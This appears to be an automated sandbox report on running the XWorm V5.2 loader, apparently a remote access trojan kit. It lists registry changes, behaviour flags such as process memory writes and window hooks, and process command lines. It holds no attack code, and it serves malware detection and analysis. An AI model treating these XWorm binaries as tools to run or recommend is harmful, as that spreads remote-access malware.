| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133603380950088431" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\CurVer\ = "ie_to_edge_bho.IEToEdgeBHO.1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\ProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}\ProgID\ = "MicrosoftEdgeUpdate.Update3WebSvc.1.0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\runas\command | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.svg\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\ = "Microsoft Edge Update Update3Web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods\ = "24" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\PROGID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachine.1.0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ = "IApp2" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine.1.0\ = "Microsoft Edge Update CredentialDialog" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\History | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\NumMethods\ = "24" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\PROGID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\Desktop\XClient.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.rar"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
